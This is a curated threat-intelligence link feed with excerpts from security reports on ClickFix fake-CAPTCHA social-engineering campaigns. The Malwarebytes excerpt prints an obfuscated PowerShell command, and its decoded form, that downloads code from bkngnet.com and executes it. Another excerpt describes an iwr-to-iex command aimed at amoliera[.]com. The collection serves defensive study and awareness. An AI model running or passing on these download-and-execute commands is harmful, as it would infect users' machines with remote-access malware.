Cyberveille, curated by Decio
21 results tagged ClickFix
State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine https://www.infosecurity-magazine.com/news/state-hackers-majority/
31/08/2025 18:20:47

James Coker, Deputy Editor, Infosecurity Magazine, 29 Aug 2025

Recorded Future highlighted the vast capabilities of state actors to rapidly weaponize newly disclosed vulnerabilities for geopolitical purposes

The majority (53%) of attributed vulnerability exploits in the first half 2025 were conducted by state-sponsored actors for strategic, geopolitical purposes, according to a new report by Recorded Future’s Insikt Group.

The researchers said the findings demonstrate the growing ability of well-resourced state-sponsored groups to weaponize flaws rapidly following disclosure. Geopolitical purposes, such as espionage and surveillance, are the key motives for these threat actors.

“The significant state-sponsored involvement also implies that these threats are not just random or opportunistic but often targeted and persistent campaigns aiming at specific sectors or high-value systems,” they noted.

The majority of state-sponsored campaigns were conducted by Chinese state-sponsored actors. These groups primarily targeted edge infrastructure and enterprise solutions, a tactic that has continued since 2024.

The suspected China-linked group UNC5221 exploited the highest number of vulnerabilities in H1 2025. It demonstrated a preference for Ivanti products, including Endpoint Manager Mobile, Connect Secure and Policy Secure.

Financially motivated groups accounted for the remaining 47% of vulnerability exploits – 27% were made up of those actors involved in theft and fraud but not linked to ransomware and 20% attributed to ransomware and extortion groups.

The researchers predicted that the exploitation of edge security appliances, remote access tools and other gateway-layer software will remain a top priority for both state-sponsored and financially-motivated groups.

“The strategic value of these systems – acting as intermediaries for encrypted traffic and privileged access – makes them high-reward targets,” they noted.

Microsoft was the most targeted vendor, with the tech giant’s products accounting for 17% of exploitations.

Most Vulnerability Exploits Required No Authentication
Insikt Group’s H1 2025 Malware and Vulnerability Trends report, published on August 28, found that the total number of disclosed common vulnerabilities and exposures (CVEs) grew 16% year-over-year.

Attackers exploited 161 distinct vulnerabilities in the six-month period, up from 136 in H1 2024.

Of the 161 flaws, 69% required no authentication to exploit, while 48% could be exploited remotely over a network.

“This heavy tilt toward unauthenticated, remote exploits means that attacks can be launched directly from the internet against vulnerable hosts, with no credentials or insider access needed,” the researchers commented.

Additionally, 30% of the exploited CVEs enabled remote code execution (RCE), which often grants an attacker full control over the target system.

ClickFix Becomes a Favored Initial Access Technique
The report observed that ransomware actors adopted new initial access techniques in H1 2025.

This included a significant increase in ClickFix social engineering attacks. ClickFix involves the use of a fake error or verification message to manipulate victims into copying and pasting a malicious script and then running it.

The tactic preys on users’ desire to fix problems themselves rather than alerting their IT team or anyone else. Therefore, it is effective at bypassing security protections as the victim infects themselves.

The Interlock gang was observed using ClickFix in campaigns in January and February 2025.

The group has also leveraged FileFix in later attacks. This tactic is an evolution on ClickFix, where users are tricked into pasting a malicious file path into a Windows File Explorer’s address bar rather than using a dialog box.

Insikt Group assesses that the success of ClickFix means this method will remain a favored initial access technique through the rest of 2025 unless widespread mitigations reduce its effectiveness.

Post-compromise, ransomware groups have increased their use of endpoint detection and response (EDR) evasion via bring-your-own-installer (BYOI) techniques, and custom payloads using just-in-time (JIT) hooking and memory injection to bypass detection.

infosecurity-magazine.com EN 2025 State-Sponsored ClickFix Hackers vulnerability
Think before you Click(Fix): Analyzing the ClickFix social engineering technique | Microsoft Security Blog https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
21/08/2025 21:40:58

Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.

The ClickFix technique attempts to trick users into running malicious commands on their devices by taking advantage of their target’s tendency to solve minor technical issues and other seemingly benign interactions, such as human verification and CAPTCHA checks. It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell. It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.

Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions. Organizations could thus reduce the impact of this technique by educating users in recognizing its lures and by implementing policies that will harden the device configurations in their environment (for example, disallowing users to use the Run dialog if it’s not necessary in their daily tasks). Microsoft Defender XDR also provides a comprehensive set of protection features that detect this threat at various stages of the attack chain.

This blog discusses the different elements that make up a ClickFix campaign—from the arrival vectors it comes with to its various implementations—and provides different examples of threat campaigns we’ve observed to further illustrate these elements. We also provide recommendations and detection details to surface and mitigate this threat.

microsoft.com EN 2025 Click(Fix) ClickFix analysis
A Wretch Client: From ClickFix deception to information stealer deployment — Elastic Security Labs https://www.elastic.co/security-labs/a-wretch-client
18/06/2025 08:23:30

Elastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware through social engineering tactics.

Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector. This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetry has tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led to campaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019 but now experiencing a significant surge in popularity.

This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malware it ultimately delivers.

Key takeaways

  • ClickFix: Remains a highly effective and prevalent initial access method.
  • GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules and improved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.
  • ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.
elastic.co EN 2025 ClickFix analysis GHOSTPULSE ARECHCLIENT2 (SECTOPRAT)
HuluCaptcha — An example of a FakeCaptcha framework https://gi7w0rm.medium.com/hulucaptcha-an-example-of-a-fakecaptcha-framework-9f50eeeb2e6d
04/06/2025 13:20:20

Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life ( finished university, started a new job, etc), I am happy to finally be able to present something new.

Chapter 1: Captcha-verified Victim
This story starts with a message by one of my long time internet contacts:

Figure 1: Shit hit the Fan
I assume some of you can already tell from this message alone that something terrible had just happened to him.

The legitimate website of the German Association for International Law had redirected him to an apparent Cloudflare Captcha site asking him to execute a PowerShell command on his device that does a web request (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into “iex”, which stands for Invoke-Expression.

That's a text-book example of a so-called FakeCaptcha attack.

For those of you that do not know what the FakeCaptcha attack technique is, let me give you a short primer:

A Captcha in itself is a legitimate method website owners use to differentiate between bots (automated traffic) and real human users. It often involves at least clicking a button but can additionally require the website visitor to solve different forms of small tasks, like clicking certain images out of a collection of random images or identifying a bunch of obscurely written letters. The goal is to only let users visit the website that are able to solve these tasks, which are often designed to be hard for computers but easy for human beings. Well, most of the time.

gi7w0rm medium 2025 EN HuluCaptcha FakeCaptcha framework ClickFix
Victims risk AsyncRAT infection after being redirected to fake Booking.com sites https://www.malwarebytes.com/blog/news/2025/06/victims-risk-asyncrat-infection-after-being-redirected-to-fake-booking-sites
04/06/2025 13:14:33

We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT.
Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.

The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.

Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

[Image: fake Captcha prompt]
As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.

Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

[Image: instructions for the visitor to infect their own device]
If you’re using Chrome, you may see this warning:

[Image: Chrome issues a warning, but the danger may be unclear to users]
The warning is nice, but it’s not very clear what this warning is for, in my opinion.

Users of Malwarebytes’ Browser Guard will see this warning:

[Image: Malwarebytes Browser Guard's clipboard warning]
“Hey, did you just copy something?

Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”

Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.

What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.

Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.

Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.

The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

IOCs
The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.


malwarebytes EN ClickFix AsyncRAT Booking.com
Hackers now testing ClickFix attacks against Linux targets https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/
12/05/2025 23:38:46

A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.

ClickFix is a social engineering tactic where fake verification systems or application errors are used to trick website visitors into running console commands that install malware.

These attacks have traditionally targeted Windows systems, prompting targets to execute PowerShell scripts from the Windows Run command, resulting in info-stealer malware infections and even ransomware.

However, a 2024 campaign using bogus Google Meet errors also targeted macOS users.

ClickFix targeting Linux users
A more recent campaign spotted by Hunt.io researchers last week is among the first to adapt this social engineering technique for Linux systems.

The attack, which is attributed to the Pakistan-linked threat group APT36 (aka "Transparent Tribe"), utilizes a website that impersonates India's Ministry of Defence with a link to an allegedly official press release.

bleepingcomputer EN 2025 APT36 ClickFix Linux Social-Engineering
Evil Deno: Abusing the Nicest JavaScript Runtime: Taggart Tech https://taggart-tech.com/evildeno/
06/05/2025 20:04:14

I've been following the development of Deno for some time. It kind of pushes all my buttons: a Rust-based Node alternative with an active web developer community?? Yes please.

As a developer, I've been looking for excuses to use Deno because, frankly, it's so much fun. It makes JavaScript/TypeScript enjoyable again by shipping sane defaults and making delightful choices about dependency management.

Deno also has some truly incredible features that go beyond the web development ecosystem. I want to focus on these features. I've wanted to explore Deno from an offensive security perspective for some time, but a new development in version 2.3 made this imperative: deno.exe—the standalone binary that constitutes the entire tool—is now code-signed on Windows.

Great news for Deno! But because of what Deno can do, it's also good news for those who would do nefarious things with it.

Code signing is a guarantee that the binary you got is the one you're supposed to have. It's supposed to be a higher level of trust than simply a hash checksum, since this is Microsoft telling you a trusted developer shipped this program.

It also means (for now), that Defender SmartScreen gives deno.exe a pass.

So what can Deno do for the red team and the ne'er-do-wells? I've put together a small sampling of demonstrations of Deno's capabilities.

I'm focusing somewhat on the "ClickFix" attack vector, since it is so prevalent at the time of writing, and apparently so effective. So with each of these, I want you to imagine some version of a user opening Win+R and pasting a short command in.

taggart-tech.com EN 2025 Evil Deno Evil-Deno Rust-based Node Defender SmartScreen ClickFix
Threat actors misuse Node.js to deliver malware and other malicious payloads | Microsoft Security Blog https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/?_bhlid=7cad219df2b33b89940e503424edaf8ccb6df9b1
20/04/2025 12:38:06

Since October 2024, Microsoft Defender Experts has observed and helped multiple customers address campaigns leveraging Node.js to deliver malware and other payloads that ultimately lead to information theft and data exfiltration.

microsoft EN 2025 Node.js malware ClickFix exfiltration analysis campaign
From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/
01/04/2025 11:54:41

Discover how Lazarus leverages fake job sites in the ClickFake Interview campaign targeting crypto firms using the ClickFix tactic.

sekoia EN 2025 ClickFake Interview ClickFix Lazarus
ClickFix: Another Deceptive Social Engineering Technique https://www.logpoint.com/en/blog/emerging-threats/clickfix-another-deceptive-social-engineering-technique/
31/03/2025 19:37:12

Discover ClickFix, a rising social engineering threat used to deliver malware and learn how to detect and respond against it with Logpoint.

logpoint EN 2025 ClickFix social-engineering Technique
Auto Dealership Supply Chain Attack https://rmceoin.github.io/malware-analysis/2025/03/13/supply-chain.html
24/03/2025 09:18:57

Over 100 auto dealerships were being abused compliments of a supply chain attack of a shared video service unique to dealerships. When active, the attack presented dealership visitors with a ClickFix webpage which led to a SectopRAT malware.

rmceoin EN 2025 Auto Dealership ClickFix SectopRAT analysis
Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/
23/03/2025 10:56:48

Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. […]

microsoft EN 2025 microsoft Phishing campaign credential-stealing malware Booking.com ClickFix
ClickFix: The Social Engineering Technique Hackers Use to Manipulate Victims https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/
13/03/2025 16:15:08

Discover how the ClickFix social engineering attack exploits human psychology to bypass security. Learn how hackers use this tactic and how to protect against it.

group-ib EN 2025 ClickFix Social Engineering Manipulation analysis
Havoc: SharePoint with Microsoft Graph API turns into FUD C2 https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
04/03/2025 08:29:11

FortiGuard Labs reveals a modified Havoc deployed by a ClickFix phishing campaign. The threat actor hides each stage behind SharePoint and also uses it as a C2.

FortiGuard-Labs-Threat-Research EN 2025 C2-server ClickFix SharePoint campaign
WordPress ClickFix Malware Causes Google Warnings and Infected Computers https://blog.sucuri.net/2025/02/wordpress-clickfix-malware-causes-google-warnings-and-infected-computers.html
23/02/2025 21:00:41

Learn about the fake Google reCAPTCHA campaign infecting machines by tricking unsuspecting users into running malicious Powershell commands.

sucuri EN 2025 WordPress ClickFix Malware reCAPTCHA
Malicious ads push Lumma infostealer via fake CAPTCHA pages https://www.bleepingcomputer.com/news/security/malicious-ads-push-lumma-infostealer-via-fake-captcha-pages/
22/12/2024 20:47:10

A large-scale malvertising campaign distributed the Lumma Stealer info-stealing malware through fake CAPTCHA verification pages that prompt users to run PowerShell commands to verify they are not a bot.

bleepingcomputer EN 2024 Captcha ClickFix Information-Stealer Lumma Malvertising Malware PowerShell Security InfoSec Computer-Security
“DeceptionAds” — Fake Captcha Driving Infostealer Infections and a Glimpse to the Dark Side of Internet Advertising https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6
16/12/2024 21:14:16

Guardio Labs tracked and analyzed a large-scale fake captcha campaign distributing a disastrous Lumma info-stealer malware that circumvents general security measures like Safe Browsing. Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over 1 million daily “ad impressions” and causing thousands of daily victims to lose their accounts and money through a network of 3,000+ content sites funneling traffic. Our research dissects this campaign and provides insights into the malvertising industry’s infrastructure, tactics, and key players.

Through a detailed analysis of redirect chains, obfuscated scripts, and Traffic Distribution Systems (TDS) — in collaboration with our friends at Infoblox — we traced the campaign’s origins to Monetag, a part of PropellerAds’ network previously tracked by Infoblox under the name “Vane Viper.” Further investigation reveals how threat actors leveraged services like BeMob ad-tracking to cloak their malicious intent, showcasing the fragmented accountability in the ad ecosystem. This lack of oversight leaves internet users vulnerable and enables malvertising campaigns to flourish at scale.

labs.guard.io EN 2024 LummaStealer ClickFix DeceptionAds Advertising
Threat Actors Push ClickFix Fake Browser Updates Using Stolen Credentials https://www.godaddy.com/resources/news/threat-actors-push-clickfix-fake-browser-updates-using-stolen-credentials
12/12/2024 12:02:49

ClickFix fake browser updates are being distributed by bogus WordPress plugins. Learn about the common indicators of compromise.

godaddy EN 2024 ClickFix Fake Browser Updates WordPress
ClickFix tactic: Revenge of detection https://blog.sekoia.io/clickfix-tactic-revenge-of-detection/
05/11/2024 14:27:46

Detect the ClickFix tactic: a social engineering technique using fake video calls and CAPTCHA pages to deploy malicious code.

sekoia EN 2024 ClickFix tactic
ClickFix tactic: The Phantom Meet https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/
30/10/2024 14:39:58

Analyse the ClickFix tactic and related campaigns. Uncover a ClickFix campaign impersonating Google Meet and cybercrime infrastructure.

sekoia EN 2024 ClickFix campaigns Google Meet